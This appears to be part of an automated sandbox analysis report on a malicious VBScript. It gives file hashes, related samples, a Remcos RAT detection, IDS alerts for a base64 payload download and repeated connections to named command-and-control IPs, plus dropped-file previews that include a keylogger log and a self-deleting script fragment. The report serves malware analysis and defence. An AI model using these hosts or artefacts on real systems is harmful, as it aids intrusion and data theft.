                                                                                              givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                              • 178.237.33.50
                                                                                              SKB-ENTERPRISENLDwocLrf8iK.rtfGet hashmaliciousUnknownBrowse
                                                                                              • 5.182.211.149
                                                                                              173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 5.182.211.149
                                                                                              Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 5.182.211.149
                                                                                              MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 5.182.211.149
                                                                                              bot_library.exeGet hashmaliciousUnknownBrowse
                                                                                              • 45.148.121.112
                                                                                              bot_library.exeGet hashmaliciousUnknownBrowse
                                                                                              • 45.148.121.112
                                                                                              i3LQkjkqOB.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                              • 45.148.121.112
                                                                                              grjD7lWffX.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                              • 45.148.121.112
                                                                                              systemd-udevd (deleted)Get hashmaliciousUnknownBrowse
                                                                                              • 45.148.120.142
                                                                                              systemd-udevd (deleted)Get hashmaliciousUnknownBrowse
                                                                                              • 45.148.120.142
                                                                                              UK2NET-ASGBBBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                              • 45.80.158.30
                                                                                              173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                              • 45.80.158.30
                                                                                              Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                              • 45.80.158.30
                                                                                              main_m68k.elfGet hashmaliciousMiraiBrowse
                                                                                              • 77.92.90.50
                                                                                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                              • 88.202.185.180
                                                                                              la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                              • 46.28.54.10
                                                                                              173261064444feee4c05378d5cb0bdc1a536ff9f623e28d93246c641e622bd865a85d1a223699.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 45.80.158.30
                                                                                              Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 45.80.158.30
                                                                                              loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                              • 80.209.188.4
                                                                                              ajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                                                              • 45.80.158.23
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              3b5074b1b5d032e5620f69f9f700ff0eYinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                              • 5.182.211.158
                                                                                              raEyjKggAf.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 5.182.211.158
                                                                                              gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 5.182.211.158
                                                                                              H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 5.182.211.158
                                                                                              0iTxQouy7k.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                              • 5.182.211.158
                                                                                              H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 5.182.211.158
                                                                                              KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 5.182.211.158
                                                                                              1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 5.182.211.158
                                                                                              StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                              • 5.182.211.158
                                                                                              8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 5.182.211.158
                                                                                              No context
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type: data
Category: dropped
Size (bytes): 144
Entropy (8bit): 3.356983879725943
Encrypted: false
SSDEEP: 3:rhlKlyKHlfVlSFXQlFi5JWRal2Jl+7R0DAlBG45klovDl6v:6lZHlHSylc5YcIeeDAlOWAv
MD5: 72BD4CD4DCB953CDEB4659742C480393
SHA1: BC9C50755E8D69968C498755E024795D591927EE
SHA-256: 1B3D8580EB02D9D27D57BC44CD38F8C08B48F5C9DC9ED83FD7CC36F907ECC192
SHA-512: 9FF2297BBB4ED74A641F0CD0C8830E24BFDF6BF99180B3410C28B7C4F0562A3B59519F31724BB7C92AEDBC6773C15AB228411F0E5602D008F4635B2F0C1344FA
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview: ....[.2.0.2.4./.1.2./.1.9. .0.7.:.2.0.:.0.7. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

Process: C:\Windows\System32\cmd.exe
File Type: Unicode text, UTF-8 text, with very long lines (13291), with CRLF line terminators
Category: dropped
Size (bytes): 156194
Entropy (8bit): 5.439573987456654
Encrypted: false
SSDEEP: 3072:A8gVmI3b0mgfmWu+Dwe9VOv5iG5sVhQ30Wk+70wgA1a:A8gVde9VOv+
MD5: F46C154B82E9739BC0CB68C2B55C7141
SHA1: 3CFFAE22113AA6D4525C702F164317713865AE49
SHA-256: 648AA1ACBA635F9025C41CB23DEDD2E86C4ABCEC1AD91493E197A1B300C74E85
SHA-512: 11F540C4D95DBF6C79D87EE29E400A0C73DB6D7FA196CEAC29051B7B9D6B8A7C858A4CB359B223BD5851B45EA3228928ECCE9A11C82C3C818A880F5F9DE91AD0
Malicious: true
Preview: Dim sh 'WScript.Shell object..Dim fso 'Scripting.FileSystemObject..Dim format 'StringFormatter object..Dim suiteFolder 'string: folder where test suite scripts are located..Dim projectFolder 'string: root folder for this project..Dim suiteFilter 'string: filename filter for selecting integration test suites...Dim caption 'string: MsgBox/PopUp title bar text...Dim aDocGens 'array of strings: filespecs for code-comment-based documentation generators...Dim aGits 'array of strings: common filespecs for Git bash and Git GUI executables...Dim aDocs 'array of strings: filespecs for last-minute docs to update before a push...Dim nextItem 'integer: current index of the prepItems array...Dim settings 'integer: controls MsgBox/PopUp behaviour...Dim prepItems 'array: list of prcedure (Sub) names to be called by window.SetTimeout...Dim flagFile 'string: filename of a temp file used by Setup.vbs...Dim versionLink 'web page with version info..Dim editor 'document editor..Dim powershell 'filespec of a

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type: JSON data
Category: dropped
Size (bytes): 963
Entropy (8bit): 5.018384957371898
Encrypted: false
SSDEEP: 12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zz2:qlupdRNuKyGX85jvXhNlT3/7CcVKWro
MD5: C9BB4D5FD5C8A01D20EBF8334B62AE54
SHA1: D38895F4CBB44CB10B6512A19034F14A2FC40359
SHA-256: 767218EC255B7E851971A77B773C0ECC59DC0B179ECA46ABCC29047EEE6216AA
SHA-512: 2D412433053610C0229FB3B73A26C8FB684F0A4AB03A53D0533FDC52D4E9882C25037015ACE7D4A411214AA9FAA780A8D950A83B57B200A877E26D7890977157
Malicious: false
Preview: {. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 9434
Entropy (8bit): 4.928515784730612
Encrypted: false
SSDEEP: 192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
MD5: D3594118838EF8580975DDA877E44DEB
SHA1: 0ACABEA9B50CA74E6EBAE326251253BAF2E53371
SHA-256: 456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
SHA-512: 103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
Malicious: false
Preview: PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.0818136700495735
Encrypted: false
SSDEEP: 3:Nlllulrlgll//Z:NllUml
MD5: BCE202BE96167104C292ABBA72DDA325
SHA1: 2F7A5938BD57E9769440EDF0B6700DD001DF7AC6
SHA-256: 680BC38EEF1B5175C4E728CEA436662498DC7F8E5570CBA66D7F9627AC0A0AEE
SHA-512: 195CAC106561793B62A216DA442AA663BDEDCDFCA2920848583880B25489E03888AF732B6F07834DB3A4E892F24020CC8E2C37D54F1B61F20BEEFCCDB38F0189
Malicious: false
Preview: @...e................................................@..........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):374
                                                                                              Entropy (8bit):3.5466023077149242
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:xPW+YR4lA2QOm3OOZgypjRQIQMlziKJRBgU9n+SksWcboIa2cdHEn9YKJRB4y0a8:xQ4lA2++ugypjBQMB3D9+gxoIajFy9Zk
                                                                                              MD5:92323D5EAFDD057F2602A2A0B5F5230E
                                                                                              SHA1:9498775850B22AF3303CE67D042C7CF3925B396B
                                                                                              SHA-256:52512978AD3BD19B5BBC6A332B2CC7635947C9F29979F746F406161FFB3AC34A
                                                                                              SHA-512:268D4FE79242535278A9CA3396D1E39F9BE88285A4EA01304BD39415728E07E5D9B8392A778732AB3B65AB050AA6AA6AADF6F4D1443B39605763FC380637BB5C
                                                                                              Malicious:true
                                                                                              Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.W.i.n.d.o.w.s.\.M.i.c.r.o.s.o.f.t...N.E.T.\.F.r.a.m.e.w.o.r.k.\.v.4...0...3.0.3.1.9.\.M.S.B.u.i.l.d...e.x.e."...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
File type: Unicode text, UTF-8 text, with very long lines (13291), with CRLF line terminators
Entropy (8bit): 5.43948911748204
TrID:
• Visual Basic Script (13500/0) 100.00%
File name: LbtytfWpvx.vbs
File size: 156'193 bytes
MD5: 4dd53bc42716f9abe36ae85c8ca8ea4b
SHA1: aa44fc15455a5283e6596a4da7ee87ac4e4b8901
SHA256: d2256247fae569fdaf99ce1a41dc036c5e4ca7b637a52314f51b726e39096573
SHA512: d9f5410d0f7c9135fa2b388030c766969ed7ea70edae73b514820bb39251f4f66d9af3d39fc46327cb7a6f207ca3e3b7e86a8fecec7629a3606d3c0789777952
SSDEEP: 3072:A8gVmI3b0mgfmWu+Dwe9VOv5iG5sVhQ30Wk+70wgA1A:A8gVde9VOvM
TLSH: 46E3AA852B2A47AC4B9DD8D6740CE416A55C123381BDE5FB7B4C4CC40F729C6CEE72AA
File Content Preview: Dim sh 'WScript.Shell object..Dim fso 'Scripting.FileSystemObject..Dim format 'StringFormatter object..Dim suiteFolder 'string: folder where test suite scripts are located..Dim projectFolder 'string: root folder for this project..Dim suiteFilter 'string:
Icon Hash: 68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-19T13:19:33.562190+0100 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 5.182.211.158 | 443 | 192.168.2.4 | 49737 | TCP
2024-12-19T13:19:33.562190+0100 | 2020425 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 | 1 | 5.182.211.158 | 443 | 192.168.2.4 | 49737 | TCP
2024-12-19T13:19:34.484602+0100 | 2057635 | ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound | 1 | 5.182.211.158 | 443 | 192.168.2.4 | 49737 | TCP
2024-12-19T13:19:34.484602+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 5.182.211.158 | 443 | 192.168.2.4 | 49737 | TCP
2024-12-19T13:19:36.355636+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49739 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:19:38.921140+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.4 | 49740 | 178.237.33.50 | 80 | TCP
2024-12-19T13:19:44.152578+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49741 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:19:45.469486+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49742 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:07.661170+0100 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 5.182.211.158 | 443 | 192.168.2.4 | 49755 | TCP
2024-12-19T13:20:07.661170+0100 | 2020425 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 | 1 | 5.182.211.158 | 443 | 192.168.2.4 | 49755 | TCP
2024-12-19T13:20:08.576424+0100 | 2057635 | ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound | 1 | 5.182.211.158 | 443 | 192.168.2.4 | 49755 | TCP
2024-12-19T13:20:08.576424+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 5.182.211.158 | 443 | 192.168.2.4 | 49755 | TCP
2024-12-19T13:20:09.876442+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49761 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:11.629417+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49767 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:13.270134+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49773 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:15.010625+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49779 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:17.229063+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49785 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:18.440638+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49786 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:19.651997+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49792 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:20.865957+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49796 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:23.082460+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49803 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:24.290957+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49805 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:25.501522+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49811 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:26.711259+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49812 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:28.928161+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49818 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:30.201122+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49824 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:31.415147+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49825 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:32.625272+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49831 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:34.844715+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49837 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:36.120281+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49841 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:37.330701+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49844 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:38.542269+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49849 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:40.762616+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49856 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:41.971518+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49857 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:43.190408+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49863 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:44.404156+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49864 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:46.647066+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49871 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:47.858375+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49876 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:49.096041+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49880 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:50.315428+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49883 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:20:52.537715+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49889 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:02.774191+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49895 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:03.984842+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49916 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:05.191448+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49922 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:07.414461+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49928 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:08.656167+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49932 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:09.866355+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49935 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:11.082137+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49940 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:13.373486+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49946 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:14.586423+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49948 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:15.803525+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49954 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:17.013748+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49955 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:19.241202+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49961 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:20.453368+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49967 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:21.687017+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49970 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:22.901213+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49974 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:25.118678+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49980 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:26.330477+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49984 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:27.537482+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49987 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:28.748787+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49993 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:30.973972+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49999 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:32.189714+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50000 | 45.80.158.30 | 23101 | TCP
2024-12-19T13:21:33.401127+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50006 | 45.80.158.30 | 23101 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 13:19:07.324316025 CET | 49675 | 443 | 192.168.2.4 | 173.222.162.32
Dec 19, 2024 13:19:31.052584887 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:31.052655935 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:31.052750111 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:31.053471088 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:31.053503990 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:32.518713951 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:32.518929005 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:32.522856951 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:32.522911072 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:32.523711920 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:32.531152964 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:32.571368933 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.102803946 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.152575970 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.294553041 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.294567108 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.294642925 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.294686079 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.294725895 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.294739008 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.294789076 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.294826031 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.294826031 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.294853926 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.346118927 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.346155882 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.346194983 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.346232891 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.346265078 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.346285105 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.499800920 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.499840975 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
Dec 19, 2024 13:19:33.499886036 CET | 49737 | 443 | 192.168.2.4 | 5.182.211.158
Dec 19, 2024 13:19:33.499926090 CET | 443 | 49737 | 5.182.211.158 | 192.168.2.4
